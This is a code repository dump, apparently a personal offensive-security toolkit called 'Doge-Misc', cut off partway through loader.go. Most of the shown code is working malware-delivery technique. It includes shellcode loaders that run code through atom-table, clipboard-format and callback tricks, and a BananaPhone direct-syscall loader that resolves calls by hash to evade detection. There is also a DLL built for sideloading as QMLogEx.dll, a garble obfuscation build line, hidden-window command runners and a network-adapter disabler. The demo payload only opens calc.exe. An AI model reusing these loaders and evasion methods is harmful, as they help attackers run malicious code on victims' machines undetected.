├── AES-GCM.go ├── AtomName.go.tmp ├── CallBack.txt ├── ClipBoard.go.tmp ├── README.md ├── base64.go ├── clash.js ├── crypt ├── go.mod └── main.go ├── disableAdapter.cs ├── dll-loader └── main.go ├── exec-cmd.go ├── exec.go ├── garble ├── golang-dll ├── build.txt ├── export.go ├── go.mod └── go.sum ├── hashloader.go ├── loader.go ├── loader_tmp.go ├── messapi.txt ├── ntdll.txt ├── otp.go ├── popcalcASM ├── asm.s ├── go.mod └── main.go ├── ptr2list.go ├── sha.go ├── vm_detect.cpp └── writeMem.go /AES-GCM.go: -------------------------------------------------------------------------------- 1 | 2 | package main 3 | 4 | import ( 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "crypto/rand" 8 | "io" 9 | "io/ioutil" 10 | "log" 11 | ) 12 | 13 | func encrypt(filename string,keyfile string)(cipherText []byte){ 14 | plaintext, err := ioutil.ReadFile(filename) 15 | if err != nil { 16 | log.Fatal(err) 17 | } 18 | 19 | // The key should be 16 bytes (AES-128), 24 bytes (AES-192) or 20 | // 32 bytes (AES-256) 21 | 22 | key, err := ioutil.ReadFile(keyfile) 23 | 24 | block, err := aes.NewCipher(key) 25 | if err != nil { 26 | log.Panic(err) 27 | } 28 | 29 | gcm, err := cipher.NewGCM(block) 30 | if err != nil { 31 | log.Panic(err) 32 | } 33 | 34 | // Never use more than 2^32 random nonces with a given key 35 | // because of the risk of repeat. 36 | nonce := make([]byte, gcm.NonceSize()) 37 | if _, err := io.ReadFull(rand.Reader, nonce); err != nil { 38 | log.Fatal(err) 39 | } 40 | 41 | ciphertext := gcm.Seal(nonce, nonce, plaintext, nil) 42 | return ciphertext 43 | } 44 | 45 | 46 | 47 | func decrypt(ciphertext []byte, key []byte)(rawText []byte){ 48 | block, err := aes.NewCipher(key) 49 | if err != nil { 50 | log.Panic(err) 51 | } 52 | 53 | gcm, err := cipher.NewGCM(block) 54 | if err != nil { 55 | log.Panic(err) 56 | } 57 | nonce := ciphertext[:gcm.NonceSize()] 58 | ciphertext = ciphertext[gcm.NonceSize():] 59 | plaintext, err := gcm.Open(nil, nonce, ciphertext, nil) 60 | if err != nil { 61 | log.Panic(err) 62 | } 63 | 64 | //err = ioutil.WriteFile("plaintext.exe", plaintext, 0777) 65 | //if err != nil { 66 | // log.Panic(err) 67 | //} 68 | 69 | return plaintext 70 | } -------------------------------------------------------------------------------- /AtomName.go.tmp: -------------------------------------------------------------------------------- 1 | size := uintptr(len(shellcode)) 2 | targetPtr := func(){} 3 | var old uint32 4 | windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)),size,windows.PAGE_EXECUTE_READWRITE,&old) 5 | 6 | k32 := syscall.NewLazyDLL("kernel32.dll") 7 | AddAtomW := k32.NewProc("AddAtomW") 8 | atom,_,_ := AddAtomW.Call(uintptr(unsafe.Pointer(&shellcode[0]))) 9 | GetAtomNameA := k32.NewProc("GetAtomNameW") 10 | GetAtomNameA.Call(atom,uintptr(unsafe.Pointer(&targetPtr)),size) 11 | syscall.Syscall(uintptr(unsafe.Pointer(&targetPtr)), 0, 0, 0, 0) 12 | -------------------------------------------------------------------------------- /CallBack.txt: -------------------------------------------------------------------------------- 1 | EnumTimeFormatsA 2 | EnumWindows 3 | EnumDesktopWindows 4 | EnumDateFormatsA 5 | EnumChildWindows 6 | EnumThreadWindows 7 | EnumSystemLocales 8 | EnumSystemGeoID 9 | EnumSystemLanguageGroupsA 10 | EnumUILanguagesA 11 | EnumSystemCodePagesA 12 | EnumDesktopsW 13 | EnumSystemCodePagesW 14 | -------------------------------------------------------------------------------- /ClipBoard.go.tmp: -------------------------------------------------------------------------------- 1 | size := uintptr(len(shellcode)) 2 | mem,_ := windows.VirtualAlloc(0,size,windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 3 | user32 := syscall.NewLazyDLL("user32.dll") 4 | reg := user32.NewProc("RegisterClipboardFormatW") 5 | name,_,_ := reg.Call(uintptr(unsafe.Pointer(&shellcode[0]))) 6 | getclipb := user32.NewProc("GetClipboardFormatNameW") 7 | getclipb.Call(name,mem,size) 8 | syscall.Syscall(mem,0, 0, 0, 0) 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Doge-Misc 2 | 杂 物 收 纳 3 | 4 | 既然是杂物便没有那么多规矩。 5 | -------------------------------------------------------------------------------- /base64.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | ) 7 | 8 | /*通用编码表,编码解码*/ 9 | func raw_64Encode(s string)string { 10 | //编码 11 | s64_std := base64.StdEncoding.EncodeToString([]byte(s)) 12 | return s64_std 13 | } 14 | 15 | /*通用编码表,编码解码*/ 16 | func raw_64Decode(s64_std string) string { 17 | //解码 18 | decodeBytes, err := base64.StdEncoding.DecodeString(s64_std) 19 | if err != nil { 20 | fmt.Println(err) 21 | return "" 22 | } 23 | return string(decodeBytes) 24 | } 25 | 26 | 27 | /* 28 | 自定义编码表,编码,解码(自定义码表 可随意变换字母排列顺序,然后会自动生成解密表) 29 | Base64只能算是一个编码算法 30 | */ 31 | func self_64Encode(s string)string { 32 | encodeStd := "rstuKLYZlmn9+/TUopqOGHIhijkABCwxyz0VWXMNgD345QRSPv6abcEF812Jdef7" 33 | s64 := base64.NewEncoding(encodeStd).EncodeToString([]byte(s)) 34 | return s64 35 | } 36 | 37 | 38 | 39 | func self_64Decode(s64 string) string { 40 | encodeStd := "rstuKLYZlmn9+/TUopqOGHIhijkABCwxyz0VWXMNgD345QRSPv6abcEF812Jdef7" 41 | //解码 42 | decodeBytes, err := base64.NewEncoding(encodeStd).DecodeString(s64) 43 | if err != nil { 44 | fmt.Println(err) 45 | return "" 46 | } 47 | return string(decodeBytes) 48 | } 49 | 50 | 51 | func main() { 52 | fmt.Println(raw_64Encode("Hello World!!!")) 53 | fmt.Println(raw_64Decode(raw_64Encode("Hello World!!!"))) 54 | 55 | fmt.Println(self_64Encode("Hello World!!!")) 56 | fmt.Println(self_64Decode(self_64Encode("Hello World!!!"))) 57 | } -------------------------------------------------------------------------------- /clash.js: -------------------------------------------------------------------------------- 1 | module.exports.parse = ({ content, name, url }, { yaml, axios, notify }) => { 2 | proxies = []; 3 | for (let proxy of content.proxies) { 4 | if (proxy.server === undefined) continue; 5 | 6 | proxies.push(proxy.name); 7 | 8 | } 9 | if (proxies.length > 0) { 10 | content['proxy-groups'].push({ 11 | 'name': '秒切', 12 | 'type': 'load-balance', 13 | 'proxies': proxies, 14 | 'url': 'http://www.gstatic.com/generate_204', 15 | 'strategy': 'round-robin', 16 | 'interval': "1" 17 | }); 18 | content['proxy-groups'][0].proxies.unshift("秒切"); 19 | } 20 | return content; 21 | } 22 | -------------------------------------------------------------------------------- /crypt/go.mod: -------------------------------------------------------------------------------- 1 | module cryptt 2 | 3 | go 1.19 4 | -------------------------------------------------------------------------------- /crypt/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "crypto/rand" 7 | "crypto/rsa" 8 | "crypto/sha256" 9 | "crypto/x509" 10 | "encoding/pem" 11 | "fmt" 12 | "io" 13 | "log" 14 | ) 15 | 16 | func Servinit() (*rsa.PrivateKey, []byte) { 17 | 18 | log.Println("服务端生成RSA密钥对并存储到变量中") 19 | // 1. 生成RSA密钥对并存储到变量中 20 | privateKey, err := rsa.GenerateKey(rand.Reader, 2048) 21 | if err != nil { 22 | fmt.Println("Error generating RSA key pair:", err) 23 | return nil, nil 24 | } 25 | publicKey := privateKey.PublicKey 26 | pubASN1, err := x509.MarshalPKIXPublicKey(&publicKey) 27 | 28 | if err != nil { 29 | fmt.Println("Error marshalling public key:", err) 30 | return nil, nil 31 | } 32 | publicKeyBytes := pem.EncodeToMemory(&pem.Block{ 33 | Type: "PUBLIC KEY", 34 | Bytes: pubASN1, 35 | }) 36 | return privateKey, publicKeyBytes 37 | 38 | } 39 | 40 | func ServStp1(innerKey string, publicKeyBytes []byte) []byte { 41 | log.Println("服务端通过预制key AES的方式加密RSA的私钥") 42 | // 2. 使用设置好的一个内置key,通过AES的方式加密rsa的私钥 43 | ciphertext, err := encrypt_AES([]byte(innerKey), publicKeyBytes) 44 | if err != nil { 45 | fmt.Println("Error encrypting public key:", err) 46 | return nil 47 | } 48 | return ciphertext 49 | } 50 | 51 | func ClientStp1(innerKey string, ciphertext []byte) *rsa.PublicKey { 52 | log.Println("客户端通过预制key AES的方式解密RSA公钥") 53 | // 3. 使用内置key解密刚才加密的公钥 54 | decryptedPubBytes, err := decrypt_AES([]byte(innerKey), ciphertext) 55 | if err != nil { 56 | fmt.Println("Error decrypting encrypted public key:", err) 57 | return nil 58 | } 59 | 60 | // 把pem格式解密出来 61 | block, _ := pem.Decode(decryptedPubBytes) 62 | decryptedPubKey, err := x509.ParsePKIXPublicKey(block.Bytes) 63 | if err != nil { 64 | fmt.Println("Error parsing decrypted public key:", err) 65 | return nil 66 | } 67 | rsaPubKey := decryptedPubKey.(*rsa.PublicKey) 68 | return rsaPubKey 69 | } 70 | 71 | func ClientStp2(rsaPubKey *rsa.PublicKey) []byte { 72 | log.Println("客户端生成一个随机的key1 并且用RSA公钥加密") 73 | // 4. 客户端生成一个随机的key1 并且用公钥加密 74 | key1 := make([]byte, 32) 75 | _, err := io.ReadFull(rand.Reader, key1) 76 | if err != nil { 77 | fmt.Println("Error generating random key1:", err) 78 | return nil 79 | } 80 | fmt.Printf("原始Key1:%x\n", key1) 81 | // 5. 公钥,rsa加密key1 82 | key1Encrypted, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, rsaPubKey, key1, []byte{}) 83 | if err != nil { 84 | fmt.Println("Error encrypting key1 with private key:", err) 85 | return nil 86 | } 87 | return key1Encrypted 88 | } 89 | 90 | func ServStp2(privateKey *rsa.PrivateKey, key1Encrypted []byte) []byte { 91 | log.Println("服务端使用私钥解密key1") 92 | // 6. 使用私钥解密key1并且打印出来 93 | key1Decrypted, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, privateKey, key1Encrypted, []byte{}) 94 | if err != nil { 95 | fmt.Println("Error decrypting key1 with public key:", err) 96 | return nil 97 | } 98 | 99 | return key1Decrypted 100 | 101 | } 102 | 103 | func main() { 104 | var PrivateKey *rsa.PrivateKey 105 | var PublicKeyBytes []byte 106 | var InnerKey = "abcdefghijklmnop" // 预制的对称加密key 107 | log.Printf("客户端与服务端预制的key为: %s\n", InnerKey) 108 | 109 | PrivateKey, PublicKeyBytes = Servinit() 110 | 111 | pubEncBytes := ServStp1(InnerKey, PublicKeyBytes) 112 | 113 | tmpPubKey := ClientStp1(InnerKey, pubEncBytes) 114 | key1Enc := ClientStp2(tmpPubKey) 115 | 116 | realKey1 := ServStp2(PrivateKey, key1Enc) 117 | 118 | fmt.Printf("解密后的Key1:%x\n", realKey1) 119 | } 120 | 121 | func encrypt_AES(key, data []byte) ([]byte, error) { 122 | block, err := aes.NewCipher(key) 123 | if err != nil { 124 | return nil, err 125 | } 126 | 127 | gcm, err := cipher.NewGCM(block) 128 | if err != nil { 129 | return nil, err 130 | } 131 | 132 | nonce := make([]byte, gcm.NonceSize()) 133 | io.ReadFull(rand.Reader, nonce) 134 | return gcm.Seal(nonce, nonce, data, nil), nil 135 | } 136 | 137 | func decrypt_AES(key, data []byte) ([]byte, error) { 138 | block, err := aes.NewCipher(key) 139 | if err != nil { 140 | return nil, err 141 | } 142 | 143 | gcm, err := cipher.NewGCM(block) 144 | if err != nil { 145 | return nil, err 146 | } 147 | 148 | nonceSize := gcm.NonceSize() 149 | nonce, ciphertext := data[:nonceSize], data[nonceSize:] 150 | return gcm.Open(nil, nonce, ciphertext, nil) 151 | } 152 | -------------------------------------------------------------------------------- /disableAdapter.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management; 3 | 4 | namespace DisableAdapter 5 | { 6 | // Token: 0x02000002 RID: 2 7 | internal class Program 8 | { 9 | // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 10 | private static void Main(string[] args) 11 | { 12 | foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher(new SelectQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionId != NULL")).Get()) 13 | { 14 | ManagementObject managementObject = (ManagementObject)managementBaseObject; 15 | if ((string)managementObject["NetConnectionId"] != "Local Network Connection") 16 | { 17 | managementObject.InvokeMethod("Disable", null); 18 | } 19 | } 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /dll-loader/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "syscall" 5 | ) 6 | 7 | func main() { 8 | dll := syscall.NewLazyDLL("QMLogEx.dll") 9 | f:= dll.NewProc("DCall") 10 | createThread := syscall.NewLazyDLL("kernel32").NewProc("CreateThread") 11 | resumeThread := syscall.NewLazyDLL("kernel32").NewProc("ResumeThread") 12 | waitForSingleObject := syscall.NewLazyDLL("kernel32").NewProc("WaitForSingleObject") 13 | //fmt.Println("CreateThread...") 14 | r1, _, err := createThread.Call( 15 | uintptr(0), 16 | uintptr(0), 17 | f.Addr(), 18 | uintptr(0), 19 | uintptr(0x00000004), 20 | uintptr(0)) 21 | if err != syscall.Errno(0) { 22 | panic(err) 23 | }else{ 24 | 25 | //fmt.Println("ResumeThread...") 26 | _, _, err = resumeThread.Call(r1) 27 | if err != syscall.Errno(0) { 28 | panic(err) 29 | } 30 | //fmt.Println("WaitForSingleObject...") 31 | _, _, err = waitForSingleObject.Call( 32 | r1, 33 | syscall.INFINITE) 34 | if err != syscall.Errno(0) { 35 | panic(err) 36 | } 37 | syscall.CloseHandle(syscall.Handle(r1)) 38 | } 39 | 40 | } -------------------------------------------------------------------------------- /exec-cmd.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | // This example requires go-cmd v1.2 or newer 4 | 5 | import ( 6 | "bufio" 7 | "bytes" 8 | "fmt" 9 | "github.com/go-cmd/cmd" 10 | "golang.org/x/text/encoding/simplifiedchinese" 11 | "golang.org/x/text/transform" 12 | "io/ioutil" 13 | "os" 14 | "runtime" 15 | "strconv" 16 | "time" 17 | ) 18 | 19 | var cmdlist []*cmd.Cmd 20 | 21 | func GbkToUtf8(s []byte) ([]byte, error) { 22 | reader := transform.NewReader(bytes.NewReader(s), simplifiedchinese.GBK.NewDecoder()) 23 | d, e := ioutil.ReadAll(reader) 24 | if e != nil { 25 | return nil, e 26 | } 27 | return d, nil 28 | } 29 | 30 | func cmds(command string) { 31 | // Disable output buffering, enable streaming 32 | cmdOptions := cmd.Options{ 33 | Buffered: true, 34 | Streaming: true, 35 | } 36 | 37 | 38 | // Create Cmd with options 39 | var envCmd *cmd.Cmd 40 | sysType := runtime.GOOS 41 | 42 | if sysType == "windows" { 43 | envCmd = cmd.NewCmdOptions(cmdOptions, "cmd.exe", "/c", command) 44 | }else { 45 | envCmd = cmd.NewCmdOptions(cmdOptions, "/bin/bash", "-c", command) 46 | } 47 | 48 | cmdlist = append(cmdlist, envCmd) 49 | // Print STDOUT and STDERR lines streaming from Cmd 50 | doneChan := make(chan struct{}) 51 | go func() { 52 | defer close(doneChan) 53 | // Done when both channels have been closed 54 | // https://dave.cheney.net/2013/04/30/curious-channels 55 | for envCmd.Stdout != nil || envCmd.Stderr != nil { 56 | lines := "\nOutput :\n" 57 | select { 58 | case line, open := <-envCmd.Stdout: 59 | if !open { 60 | envCmd.Stdout = nil 61 | continue 62 | } 63 | //fmt.Println(line) 64 | lines = lines + line + "\n" 65 | 66 | case line, open := <-envCmd.Stderr: 67 | if !open { 68 | envCmd.Stderr = nil 69 | continue 70 | } 71 | fmt.Println(os.Stderr, line) 72 | } 73 | gbk, _ := GbkToUtf8([]byte(lines)) 74 | fmt.Println(string(gbk)+"\n") 75 | 76 | } 77 | }() 78 | 79 | 80 | // Run and wait for Cmd to return, discard Status 81 | //<-envCmd.Start() 82 | statusChan := envCmd.Start() 83 | _ = statusChan 84 | 85 | // Wait for goroutine to print everything 86 | <-doneChan 87 | DeleteSlice(envCmd) 88 | } 89 | 90 | 91 | func DeleteSlice(envCmd *cmd.Cmd){ 92 | j := 0 93 | for _, val := range cmdlist { 94 | if val == envCmd { 95 | fmt.Println("Del: "+ strconv.Itoa(envCmd.Status().PID)) 96 | break 97 | } 98 | j++ 99 | } 100 | for i := j+1;i 0 { 111 | for l := 0; l < len(cmdlist); l++ { 112 | i = cmdlist[l] 113 | str := "PID: " + strconv.Itoa(i.Status().PID)+"; CMD: " + i.Status().Cmd+"; Runtime: " + strconv.Itoa(int(i.Status().Runtime)) 114 | fmt.Printf("%20s\n", str+"----------------------------------------------------") 115 | } 116 | } 117 | time.Sleep(1*time.Second) 118 | } 119 | 120 | } 121 | 122 | func getInput() string { 123 | //使用os.Stdin开启输入流 124 | //函数原型 func NewReader(rd io.Reader) *Reader 125 | //NewReader创建一个具有默认大小缓冲、从r读取的*Reader 结构见官方文档 126 | in := bufio.NewReader(os.Stdin) 127 | //in.ReadLine函数具有三个返回值 []byte bool error 128 | //分别为读取到的信息 是否数据太长导致缓冲区溢出 是否读取失败 129 | str, _, err := in.ReadLine() 130 | if err != nil { 131 | return err.Error() 132 | } 133 | return string(str) 134 | } 135 | 136 | 137 | 138 | 139 | func getInputByScanner() string { 140 | var str string 141 | //使用os.Stdin开启输入流 142 | in := bufio.NewScanner(os.Stdin) 143 | if in.Scan() { 144 | str = in.Text() 145 | } else { 146 | str = "Find input error" 147 | } 148 | return str 149 | } 150 | 151 | 152 | func main(){ 153 | go monitor() 154 | for { 155 | go cmds(getInput()) 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /exec.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "context" 7 | "fmt" 8 | "github.com/pkg/errors" 9 | "golang.org/x/text/encoding/simplifiedchinese" 10 | "golang.org/x/text/transform" 11 | "io/ioutil" 12 | "os" 13 | "os/exec" 14 | "strconv" 15 | "syscall" 16 | "time" 17 | ) 18 | 19 | import "github.com/shirou/gopsutil/process" 20 | 21 | type OutputStream struct { 22 | streamChan chan string 23 | bufSize int 24 | buf []byte 25 | lastChar int 26 | } 27 | 28 | var ( 29 | ErrLineBufferOverflow = errors.New("line buffer overflow") 30 | ) 31 | 32 | 33 | // Write makes OutputStream implement the io.Writer interface. 34 | func (rw *OutputStream) Write(p []byte) (n int, err error) { 35 | n = len(p) // end of buffer 36 | firstChar := 0 37 | 38 | for { 39 | newlineOffset := bytes.IndexByte(p[firstChar:], '\n') 40 | if newlineOffset < 0 { 41 | break // no newline in stream, next line incomplete 42 | } 43 | 44 | // End of line offset is start (nextLine) + newline offset. Like bufio.Scanner, 45 | // we allow \r\n but strip the \r too by decrementing the offset for that byte. 46 | lastChar := firstChar + newlineOffset // "line\n" 47 | if newlineOffset > 0 && p[newlineOffset-1] == '\r' { 48 | lastChar -= 1 // "line\r\n" 49 | } 50 | 51 | // Send the line, prepend line buffer if set 52 | var line string 53 | if rw.lastChar > 0 { 54 | line = string(rw.buf[0:rw.lastChar]) 55 | rw.lastChar = 0 // reset buffer 56 | } 57 | line += string(p[firstChar:lastChar]) 58 | rw.streamChan <- line // blocks if chan full 59 | 60 | // Next line offset is the first byte (+1) after the newline (i) 61 | firstChar += newlineOffset + 1 62 | } 63 | 64 | if firstChar < n { 65 | remain := len(p[firstChar:]) 66 | bufFree := len(rw.buf[rw.lastChar:]) 67 | if remain > bufFree { 68 | var line string 69 | if rw.lastChar > 0 { 70 | line = string(rw.buf[0:rw.lastChar]) 71 | } 72 | line += string(p[firstChar:]) 73 | err = ErrLineBufferOverflow 74 | n = firstChar 75 | return // implicit 76 | } 77 | copy(rw.buf[rw.lastChar:], p[firstChar:]) 78 | rw.lastChar += remain 79 | } 80 | 81 | return // implicit 82 | } 83 | 84 | // NewOutputStream creates a new streaming output on the given channel. 85 | func NewOutputStream(streamChan chan string) *OutputStream { 86 | out := &OutputStream{ 87 | streamChan: streamChan, 88 | bufSize: 16384, 89 | buf: make([]byte, 16384), 90 | lastChar: 0, 91 | } 92 | return out 93 | } 94 | 95 | func TestCheckStream(command string,timeout int,output bool) { 96 | stdoutChan := make(chan string, 100) 97 | if output { 98 | go func() { 99 | for line := range stdoutChan { 100 | gbk, _ := GbkToUtf8([]byte(line)) 101 | fmt.Print("Output: ") 102 | fmt.Println(string(gbk)) 103 | } 104 | }() 105 | } 106 | ctx, cancel := context.WithTimeout(context.TODO(), time.Duration(timeout)*time.Second) 107 | defer cancel() 108 | cmd := exec.CommandContext(ctx, "cmd.exe", "/c", command) 109 | cmd.SysProcAttr = &syscall.SysProcAttr{ 110 | HideWindow: true, 111 | } 112 | stdout := NewOutputStream(stdoutChan) 113 | cmd.Stdout = stdout 114 | if err := cmd.Start(); err != nil { 115 | return 116 | } 117 | fmt.Println("PID: "+strconv.Itoa(cmd.Process.Pid)) 118 | waitChan := make(chan struct{}, 1) 119 | defer close(waitChan) 120 | 121 | // 超时杀掉进程组 或正常退出 122 | go func() { 123 | select { 124 | case <-ctx.Done(): 125 | fmt.Println("Timeout Exit: "+strconv.Itoa(cmd.Process.Pid)) 126 | p, _ := process.NewProcess(int32(cmd.Process.Pid)) // Specify process id of parent 127 | // handle error 128 | vp,_ := p.Children() 129 | var v *process.Process 130 | for _, v = range vp { 131 | _ = v.Kill() // Kill each child 132 | // handle error 133 | } 134 | p.Kill() // Kill the parent process 135 | case <-waitChan: 136 | fmt.Println("Success Exit: "+strconv.Itoa(cmd.Process.Pid)) 137 | } 138 | }() 139 | 140 | if err := cmd.Wait(); err != nil { 141 | return 142 | } 143 | } 144 | 145 | 146 | func getInput() string { 147 | //使用os.Stdin开启输入流 148 | //函数原型 func NewReader(rd io.Reader) *Reader 149 | //NewReader创建一个具有默认大小缓冲、从r读取的*Reader 结构见官方文档 150 | in := bufio.NewReader(os.Stdin) 151 | //in.ReadLine函数具有三个返回值 []byte bool error 152 | //分别为读取到的信息 是否数据太长导致缓冲区溢出 是否读取失败 153 | str, _, err := in.ReadLine() 154 | if err != nil { 155 | return err.Error() 156 | } 157 | return string(str) 158 | } 159 | 160 | 161 | func GbkToUtf8(s []byte) ([]byte, error) { 162 | reader := transform.NewReader(bytes.NewReader(s), simplifiedchinese.GBK.NewDecoder()) 163 | d, e := ioutil.ReadAll(reader) 164 | if e != nil { 165 | return nil, e 166 | } 167 | return d, nil 168 | } 169 | 170 | 171 | func main(){ 172 | fmt.Print("set timeout: ") 173 | timeout,err := strconv.Atoi(getInput()) 174 | if err != nil{ 175 | timeout = 999999999 176 | }else if timeout == 0{ 177 | timeout = 999999999 178 | } 179 | fmt.Println("Get Output: t/f?") 180 | fmt.Print("Output: ") 181 | output := true 182 | op := getInput() 183 | if op == "f"{ 184 | output = false 185 | }else{ 186 | output = true 187 | } 188 | for { 189 | cmd := getInput() 190 | go TestCheckStream(cmd,timeout,output) 191 | } 192 | } -------------------------------------------------------------------------------- /garble: -------------------------------------------------------------------------------- 1 | .\garble.exe -literals -seed=random -tiny build -tags=project -trimpath -ldflags "-w -s" 2 | 3 | 4 | -------------------------------------------------------------------------------- /golang-dll/build.txt: -------------------------------------------------------------------------------- 1 | go build -buildmode=c-shared -o QMLogEx.dll .\export.go -------------------------------------------------------------------------------- /golang-dll/export.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "C" 4 | import ( 5 | "fmt" 6 | "os/exec" 7 | ) 8 | 9 | //export DCall 10 | func DCall() { 11 | exec.Command("calc.exe").Start() 12 | fmt.Println("test") 13 | } 14 | 15 | 16 | 17 | func main() { 18 | } -------------------------------------------------------------------------------- /golang-dll/go.mod: -------------------------------------------------------------------------------- 1 | module QMLogEx 2 | 3 | go 1.17 4 | 5 | require golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e 6 | -------------------------------------------------------------------------------- /golang-dll/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e h1:fLOSk5Q00efkSvAm+4xcoXD+RRmLmmulPn5I3Y9F2EM= 2 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 3 | -------------------------------------------------------------------------------- /hashloader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/sha1" 5 | "fmt" 6 | "strings" 7 | "syscall" 8 | "unsafe" 9 | 10 | bananaphone"github.com/timwhitez/BananaPhone/pkg/BananaPhone" 11 | ) 12 | 13 | var shellcode = []byte{ 14 | //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode 15 | 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63, 16 | 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51, 17 | 0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b, 18 | 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18, 19 | 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29, 20 | 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 21 | 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 22 | 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57, 23 | 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 24 | 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 25 | 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad, 26 | 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 27 | 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 28 | 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff, 29 | 0xd7, 30 | } 31 | 32 | //example of using bananaphone to execute shellcode in the current thread. 33 | func main() { 34 | fmt.Println("Mess with the banana, die like the... banana?") //I found it easier to breakpoint the consolewrite function to mess with the in-memory ntdll to verify the auto-switch to disk works sanely than to try and live-patch it programatically. 35 | bp, e := bananaphone.NewBananaPhone(bananaphone.DiskBananaPhoneMode) 36 | if e != nil { 37 | panic(e) 38 | } 39 | //resolve the functions and extract the syscalls 40 | 41 | a, e := bp.GetSysIDfromhash("0e8af4e8ad4cca0cccd9a9cbfa30b1148f9d63ee",str2sha1) 42 | if e != nil { 43 | panic(e) 44 | } 45 | 46 | p, e := bp.GetSysIDfromhash("646bd5afa7b482fdd90fb8f2eefe1301a867d7b9",str2sha1) 47 | if e != nil { 48 | panic(e) 49 | } 50 | 51 | c, e := bp.GetSysIDfromhash("b392e445cb36453331f1570154e520ec845fca9c",str2sha1) 52 | if e != nil { 53 | panic(e) 54 | } 55 | ct(shellcode, uintptr(0xffffffffffffffff), a, p, c) 56 | } 57 | 58 | func ct(shellcode []byte, handle uintptr, a, p, c uint16) { 59 | 60 | const ( 61 | thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle. 62 | memCommit = uintptr(0x00001000) 63 | memreserve = uintptr(0x00002000) 64 | ) 65 | 66 | var baseA uintptr 67 | regionsize := uintptr(len(shellcode)) 68 | r1, r := bananaphone.Syscall( 69 | a, //ntallocatevirtualmemory 70 | handle, 71 | uintptr(unsafe.Pointer(&baseA)), 72 | 0, 73 | uintptr(unsafe.Pointer(®ionsize)), 74 | uintptr(memCommit|memreserve), 75 | syscall.PAGE_READWRITE, 76 | ) 77 | if r != nil { 78 | fmt.Printf("1 %s %x\n", r, r1) 79 | return 80 | } 81 | //write memory 82 | bananaphone.WriteMemory(shellcode, baseA) 83 | 84 | var oldprotect uintptr 85 | r1, r = bananaphone.Syscall( 86 | p, //NtProtectVirtualMemory 87 | handle, 88 | uintptr(unsafe.Pointer(&baseA)), 89 | uintptr(unsafe.Pointer(®ionsize)), 90 | syscall.PAGE_EXECUTE_READ, 91 | uintptr(unsafe.Pointer(&oldprotect)), 92 | ) 93 | if r != nil { 94 | fmt.Printf("1 %s %x\n", r, r1) 95 | return 96 | } 97 | var hh uintptr 98 | r1, r = bananaphone.Syscall( 99 | c, 100 | uintptr(unsafe.Pointer(&hh)), //hthread 101 | 0x1FFFFF, //desiredaccess 102 | 0, //objattributes 103 | handle, //processhandle 104 | baseA, //lpstartaddress 105 | 0, //lpparam 106 | uintptr(0), //createsuspended 107 | 0, //zerobits 108 | 0, //sizeofstackcommit 109 | 0, //sizeofstackreserve 110 | 0, //lpbytesbuffer 111 | ) 112 | syscall.WaitForSingleObject(syscall.Handle(hh), 0xffffffff) 113 | if r != nil { 114 | fmt.Printf("1 %s %x\n", r, r1) 115 | return 116 | } 117 | } 118 | 119 | func str2sha1(s string) string{ 120 | s = strings.ToLower(s) 121 | h := sha1.New() 122 | h.Write([]byte(s)) 123 | bs := h.Sum(nil) 124 | return fmt.Sprintf("%x", bs) 125 | } -------------------------------------------------------------------------------- /loader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | 10 | bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone" 11 | ) 12 | /* 13 | var shellcode1 = []byte{ 14 | //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode 15 | 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63, 16 | 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51, 17 | 